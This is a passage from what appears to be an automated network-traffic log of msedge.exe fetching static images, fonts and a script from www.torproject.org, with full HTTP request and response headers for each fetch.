Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:09:23 GMT
Server: Apache
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-Xss-Protection: 1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15768000; preload
Onion-Location: http://2gzyxa5ihm7nsggfxnu52rck2vv4rvmdlkiu3zzui5du4xyclen53wid.onion/static/fonts/SourceCodePro/SourceCodePro-Regular.ttf
Content-Security-Policy: default-src 'self'; script-src 'self' 'sha256-J/tux0AP4WAYsCxprPoE+2XJ+XNJ8Esd8nCF8o/diiw='; style-src 'self' 'unsafe-inline';
Last-Modified: Tue, 08 Mar 2022 14:35:59 GMT
ETag: "1d6e4-5d9b5e651c454-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Expires: Fri, 03 Jan 2025 10:09:23 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 56349
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: application/font-sfnt
Content-Language: en
GET

https://www.torproject.org/static/images/tor-logo@2x.png?h=16ad42bc

msedge.exe

Remote address:

204.8.99.144:443

Request

GET /static/images/tor-logo@2x.png?h=16ad42bc HTTP/1.1
Host: www.torproject.org
Connection: keep-alive
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:09:23 GMT
Server: Apache
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-Xss-Protection: 1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15768000; preload
Onion-Location: http://2gzyxa5ihm7nsggfxnu52rck2vv4rvmdlkiu3zzui5du4xyclen53wid.onion/static/images/tor-logo@2x.png
Content-Security-Policy: default-src 'self'; script-src 'self' 'sha256-J/tux0AP4WAYsCxprPoE+2XJ+XNJ8Esd8nCF8o/diiw='; style-src 'self' 'unsafe-inline';
Last-Modified: Tue, 08 Feb 2022 21:47:05 GMT
ETag: "273a-5d788a8702840"
Accept-Ranges: bytes
Content-Length: 10042
Cache-Control: max-age=86400
Expires: Thu, 05 Dec 2024 10:09:23 GMT
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: image/png
Content-Language: en
GET

https://www.torproject.org/static/images/yec/illo-yec-browse.png?h=86d8fd2b

msedge.exe

Remote address:

204.8.99.144:443

Request

GET /static/images/yec/illo-yec-browse.png?h=86d8fd2b HTTP/1.1
Host: www.torproject.org
Connection: keep-alive
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:09:23 GMT
Server: Apache
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-Xss-Protection: 1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15768000; preload
Onion-Location: http://2gzyxa5ihm7nsggfxnu52rck2vv4rvmdlkiu3zzui5du4xyclen53wid.onion/static/images/yec/illo-yec-browse.png
Content-Security-Policy: default-src 'self'; script-src 'self' 'sha256-J/tux0AP4WAYsCxprPoE+2XJ+XNJ8Esd8nCF8o/diiw='; style-src 'self' 'unsafe-inline';
Last-Modified: Mon, 14 Oct 2024 15:02:39 GMT
ETag: "c7c5-6247120c00846"
Accept-Ranges: bytes
Content-Length: 51141
Cache-Control: max-age=86400
Expires: Thu, 05 Dec 2024 10:09:23 GMT
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: image/png
Content-Language: en
GET

https://www.torproject.org/static/js/bootstrap.bundle.min.js?h=46d1f82f

msedge.exe

Remote address:

204.8.99.144:443

Request

GET /static/js/bootstrap.bundle.min.js?h=46d1f82f HTTP/1.1
Host: www.torproject.org
Connection: keep-alive
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: script
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:09:23 GMT
Server: Apache
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-Xss-Protection: 1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15768000; preload
Onion-Location: http://2gzyxa5ihm7nsggfxnu52rck2vv4rvmdlkiu3zzui5du4xyclen53wid.onion/static/js/bootstrap.bundle.min.js
Content-Security-Policy: default-src 'self'; script-src 'self' 'sha256-J/tux0AP4WAYsCxprPoE+2XJ+XNJ8Esd8nCF8o/diiw='; style-src 'self' 'unsafe-inline';
Last-Modified: Tue, 08 Feb 2022 21:27:49 GMT
ETag: "10f4d-5d7886388ff40"
Accept-Ranges: bytes
Content-Length: 69453
Cache-Control: max-age=3600
Expires: Wed, 04 Dec 2024 11:09:23 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/javascript
Content-Language: en
GET

https://www.torproject.org/static/fonts/fontawesome/webfonts/fa-brands-400.woff2

msedge.exe

Remote address:

204.8.99.144:443

Request

GET /static/fonts/fontawesome/webfonts/fa-brands-400.woff2 HTTP/1.1
Host: www.torproject.org
Connection: keep-alive
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
Origin: https://www.torproject.org
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
DNT: 1
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: font
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:09:23 GMT
Server: Apache
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-Xss-Protection: 1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15768000; preload
Onion-Location: http://2gzyxa5ihm7nsggfxnu52rck2vv4rvmdlkiu3zzui5du4xyclen53wid.onion/static/fonts/fontawesome/webfonts/fa-brands-400.woff2
Content-Security-Policy: default-src 'self'; script-src 'self' 'sha256-J/tux0AP4WAYsCxprPoE+2XJ+XNJ8Esd8nCF8o/diiw='; style-src 'self' 'unsafe-inline';
Last-Modified: Tue, 08 Feb 2022 21:27:51 GMT
ETag: "120d0-5d78863a783c0-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Expires: Fri, 03 Jan 2025 10:09:23 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 73969
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: application/font-woff2
Content-Language: en
GET

https://www.torproject.org/static/images/yec/x-dark.png?h=353e04cc

msedge.exe

Remote address:

204.8.99.144:443

Request

GET /static/images/yec/x-dark.png?h=353e04cc HTTP/1.1
Host: www.torproject.org
Connection: keep-alive
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:09:23 GMT
Server: Apache
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-Xss-Protection: 1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15768000; preload
Onion-Location: http://2gzyxa5ihm7nsggfxnu52rck2vv4rvmdlkiu3zzui5du4xyclen53wid.onion/static/images/yec/x-dark.png
Content-Security-Policy: default-src 'self'; script-src 'self' 'sha256-J/tux0AP4WAYsCxprPoE+2XJ+XNJ8Esd8nCF8o/diiw='; style-src 'self' 'unsafe-inline';
Last-Modified: Mon, 14 Oct 2024 15:02:39 GMT
ETag: "1e7-6247120c017e6"
Accept-Ranges: bytes
Content-Length: 487
Cache-Control: max-age=86400
Expires: Thu, 05 Dec 2024 10:09:23 GMT
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: image/png
Content-Language: en
GET

https://www.torproject.org/static/images/download/png/stay-safe@3x.png?h=f11bdbfa

msedge.exe

Remote address:

204.8.99.144:443

Request

GET /static/images/download/png/stay-safe@3x.png?h=f11bdbfa HTTP/1.1
Host: www.torproject.org
Connection: keep-alive
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:09:23 GMT
Server: Apache
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-Xss-Protection: 1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15768000; preload
Onion-Location: http://2gzyxa5ihm7nsggfxnu52rck2vv4rvmdlkiu3zzui5du4xyclen53wid.onion/static/images/download/png/stay-safe@3x.png
Content-Security-Policy: default-src 'self'; script-src 'self' 'sha256-J/tux0AP4WAYsCxprPoE+2XJ+XNJ8Esd8nCF8o/diiw='; style-src 'self' 'unsafe-inline';
Last-Modified: Tue, 08 Feb 2022 21:47:06 GMT
ETag: "1495c-5d788a87f6a80"
Accept-Ranges: bytes
Content-Length: 84316
Cache-Control: max-age=86400
Expires: Thu, 05 Dec 2024 10:09:23 GMT
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: image/png
Content-Language: en
GET

https://www.torproject.org/static/fonts/fontawesome/png/white/brands/linux.png

msedge.exe

Remote address:

204.8.99.144:443

Request

GET /static/fonts/fontawesome/png/white/brands/linux.png HTTP/1.1
Host: www.torproject.org
Connection: keep-alive
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:09:24 GMT
Server: Apache
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-Xss-Protection: 1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15768000; preload
Onion-Location: http://2gzyxa5ihm7nsggfxnu52rck2vv4rvmdlkiu3zzui5du4xyclen53wid.onion/static/fonts/fontawesome/png/white/brands/linux.png
Content-Security-Policy: default-src 'self'; script-src 'self' 'sha256-J/tux0AP4WAYsCxprPoE+2XJ+XNJ8Esd8nCF8o/diiw='; style-src 'self' 'unsafe-inline';
Last-Modified: Tue, 08 Feb 2022 21:28:04 GMT
ETag: "17d5-5d788646de100"
Accept-Ranges: bytes
Content-Length: 6101
Cache-Control: max-age=86400
Expires: Thu, 05 Dec 2024 10:09:24 GMT
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: image/png
Content-Language: en
GET

https://www.torproject.org/static/fonts/fontawesome/png/white/brands/mastodon.png

msedge.exe

Remote address:

204.8.99.144:443

Request

GET /static/fonts/fontawesome/png/white/brands/mastodon.png HTTP/1.1
Host: www.torproject.org
Connection: keep-alive
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:09:24 GMT
Server: Apache
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-Xss-Protection: 1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15768000; preload
Onion-Location: http://2gzyxa5ihm7nsggfxnu52rck2vv4rvmdlkiu3zzui5du4xyclen53wid.onion/static/fonts/fontawesome/png/white/brands/mastodon.png
Content-Security-Policy: default-src 'self'; script-src 'self' 'sha256-J/tux0AP4WAYsCxprPoE+2XJ+XNJ8Esd8nCF8o/diiw='; style-src 'self' 'unsafe-inline';
Last-Modified: Tue, 08 Feb 2022 21:28:04 GMT
ETag: "160b-5d788646de100"
Accept-Ranges: bytes
Content-Length: 5643
Cache-Control: max-age=86400
Expires: Thu, 05 Dec 2024 10:09:24 GMT
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: image/png
Content-Language: en
GET

https://www.torproject.org/static/images/download/svg/get-connected.svg?h=5e2656db

msedge.exe

Remote address:

204.8.99.144:443

Request

GET /static/images/download/svg/get-connected.svg?h=5e2656db HTTP/1.1
Host: www.torproject.org
Connection: keep-alive
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:09:24 GMT
Server: Apache
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-Xss-Protection: 1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15768000; preload
Onion-Location: http://2gzyxa5ihm7nsggfxnu52rck2vv4rvmdlkiu3zzui5du4xyclen53wid.onion/static/images/download/svg/get-connected.svg
Content-Security-Policy: default-src 'self'; script-src 'self' 'sha256-J/tux0AP4WAYsCxprPoE+2XJ+XNJ8Esd8nCF8o/diiw='; style-src 'self' 'unsafe-inline';
Last-Modified: Tue, 08 Feb 2022 21:27:50 GMT
ETag: "141f6-5d78863984180-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=86400
Expires: Thu, 05 Dec 2024 10:09:24 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 29972
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: image/svg+xml
Content-Language: en
GET

https://www.torproject.org/static/fonts/fontawesome/png/primary/solid/signature.png

msedge.exe

Remote address:

204.8.99.144:443

Request

GET /static/fonts/fontawesome/png/primary/solid/signature.png HTTP/1.1
Host: www.torproject.org
Connection: keep-alive
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:09:24 GMT
Server: Apache
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-Xss-Protection: 1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15768000; preload
Onion-Location: http://2gzyxa5ihm7nsggfxnu52rck2vv4rvmdlkiu3zzui5du4xyclen53wid.onion/static/fonts/fontawesome/png/primary/solid/signature.png
Content-Security-Policy: default-src 'self'; script-src 'self' 'sha256-J/tux0AP4WAYsCxprPoE+2XJ+XNJ8Esd8nCF8o/diiw='; style-src 'self' 'unsafe-inline';
Last-Modified: Tue, 08 Feb 2022 21:28:02 GMT
ETag: "146c-5d788644f5c80"
Accept-Ranges: bytes
Content-Length: 5228
Cache-Control: max-age=86400
Expires: Thu, 05 Dec 2024 10:09:24 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/png
Content-Language: en
GET

https://www.torproject.org/static/fonts/fontawesome/png/white/brands/linkedin.png

msedge.exe

Remote address:

204.8.99.144:443

Request

GET /static/fonts/fontawesome/png/white/brands/linkedin.png HTTP/1.1
Host: www.torproject.org
Connection: keep-alive
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:09:24 GMT
Server: Apache
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-Xss-Protection: 1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15768000; preload
Onion-Location: http://2gzyxa5ihm7nsggfxnu52rck2vv4rvmdlkiu3zzui5du4xyclen53wid.onion/static/fonts/fontawesome/png/white/brands/linkedin.png
Content-Security-Policy: default-src 'self'; script-src 'self' 'sha256-J/tux0AP4WAYsCxprPoE+2XJ+XNJ8Esd8nCF8o/diiw='; style-src 'self' 'unsafe-inline';
Last-Modified: Tue, 08 Feb 2022 21:28:03 GMT
ETag: "bc7-5d788645e9ec0"
Accept-Ranges: bytes
Content-Length: 3015
Cache-Control: max-age=86400
Expires: Thu, 05 Dec 2024 10:09:24 GMT
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: image/png
Content-Language: en
GET

https://www.torproject.org/static/images/yec/illo-yec-browse.svg?h=86d8fd2b

msedge.exe

Remote address:

204.8.99.144:443

Request

GET /static/images/yec/illo-yec-browse.svg?h=86d8fd2b HTTP/1.1
Host: www.torproject.org
Connection: keep-alive
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:09:24 GMT
Server: Apache
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-Xss-Protection: 1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15768000; preload
Onion-Location: http://2gzyxa5ihm7nsggfxnu52rck2vv4rvmdlkiu3zzui5du4xyclen53wid.onion/static/images/yec/illo-yec-browse.svg
Content-Security-Policy: default-src 'self'; script-src 'self' 'sha256-J/tux0AP4WAYsCxprPoE+2XJ+XNJ8Esd8nCF8o/diiw='; style-src 'self' 'unsafe-inline';
Last-Modified: Mon, 14 Oct 2024 15:02:39 GMT
ETag: "4d27-6247120c00846-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=86400
Expires: Thu, 05 Dec 2024 10:09:24 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 5887
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: image/svg+xml
Content-Language: en
GET

https://www.torproject.org/static/fonts/fontawesome/png/white/brands/facebook.png

msedge.exe

Remote address:

204.8.99.144:443

Request

GET /static/fonts/fontawesome/png/white/brands/facebook.png HTTP/1.1
Host: www.torproject.org
Connection: keep-alive
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:09:24 GMT
Server: Apache
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-Xss-Protection: 1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15768000; preload
Onion-Location: http://2gzyxa5ihm7nsggfxnu52rck2vv4rvmdlkiu3zzui5du4xyclen53wid.onion/static/fonts/fontawesome/png/white/brands/facebook.png
Content-Security-Policy: default-src 'self'; script-src 'self' 'sha256-J/tux0AP4WAYsCxprPoE+2XJ+XNJ8Esd8nCF8o/diiw='; style-src 'self' 'unsafe-inline';
Last-Modified: Tue, 08 Feb 2022 21:28:04 GMT
ETag: "82f-5d788646de100"
Accept-Ranges: bytes
Content-Length: 2095
Cache-Control: max-age=86400
Expires: Thu, 05 Dec 2024 10:09:24 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/png
Content-Language: en
GET

https://www.torproject.org/static/fonts/fontawesome/png/white/brands/github.png

msedge.exe

Remote address:

204.8.99.144:443

Request

GET /static/fonts/fontawesome/png/white/brands/github.png HTTP/1.1
Host: www.torproject.org
Connection: keep-alive
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:09:24 GMT
Server: Apache
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-Xss-Protection: 1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15768000; preload
Onion-Location: http://2gzyxa5ihm7nsggfxnu52rck2vv4rvmdlkiu3zzui5du4xyclen53wid.onion/static/fonts/fontawesome/png/white/brands/github.png
Content-Security-Policy: default-src 'self'; script-src 'self' 'sha256-J/tux0AP4WAYsCxprPoE+2XJ+XNJ8Esd8nCF8o/diiw='; style-src 'self' 'unsafe-inline';
Last-Modified: Tue, 08 Feb 2022 21:28:04 GMT
ETag: "1d73-5d788646de100"
Accept-Ranges: bytes
Content-Length: 7539
Cache-Control: max-age=86400
Expires: Thu, 05 Dec 2024 10:09:24 GMT
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: image/png
Content-Language: en
GET

https://www.torproject.org/static/images/yec/illo-yec-search.svg?h=347ed4b2

msedge.exe

Remote address:

204.8.99.144:443

Request

GET /static/images/yec/illo-yec-search.svg?h=347ed4b2 HTTP/1.1
Host: www.torproject.org
Connection: keep-alive
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:09:24 GMT
Server: Apache
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-Xss-Protection: 1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15768000; preload
Onion-Location: http://2gzyxa5ihm7nsggfxnu52rck2vv4rvmdlkiu3zzui5du4xyclen53wid.onion/static/images/yec/illo-yec-search.svg
Content-Security-Policy: default-src 'self'; script-src 'self' 'sha256-J/tux0AP4WAYsCxprPoE+2XJ+XNJ8Esd8nCF8o/diiw='; style-src 'self' 'unsafe-inline';
Last-Modified: Mon, 14 Oct 2024 15:02:39 GMT
ETag: "1ef5-6247120c00846-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=86400
Expires: Thu, 05 Dec 2024 10:09:24 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 2318
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: image/svg+xml
Content-Language: en
GET

https://www.torproject.org/static/images/yec/illo-yec-browse.png?h=86d8fd2b

msedge.exe

Remote address:

204.8.99.144:443

Request

GET /static/images/yec/illo-yec-browse.png?h=86d8fd2b HTTP/1.1
Host: www.torproject.org
Connection: keep-alive
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Range: bytes=23384-23384
If-Range: "c7c5-6247120c00846"

Response

HTTP/1.1 206 Partial Content

Date: Wed, 04 Dec 2024 10:09:27 GMT
Server: Apache
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-Xss-Protection: 1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15768000; preload
Onion-Location: http://2gzyxa5ihm7nsggfxnu52rck2vv4rvmdlkiu3zzui5du4xyclen53wid.onion/static/images/yec/illo-yec-browse.png
Content-Security-Policy: default-src 'self'; script-src 'self' 'sha256-J/tux0AP4WAYsCxprPoE+2XJ+XNJ8Esd8nCF8o/diiw='; style-src 'self' 'unsafe-inline';
Last-Modified: Mon, 14 Oct 2024 15:02:39 GMT
ETag: "c7c5-6247120c00846"
Accept-Ranges: bytes
Content-Length: 1
Cache-Control: max-age=86400
Expires: Thu, 05 Dec 2024 10:09:27 GMT
Content-Range: bytes 23384-23384/51141
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: image/png
Content-Language: en
GET

https://www.torproject.org/thank-you/

msedge.exe

Remote address:

204.8.99.144:443

Request

GET /thank-you/ HTTP/1.1
Host: www.torproject.org
Connection: keep-alive
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
DNT: 1
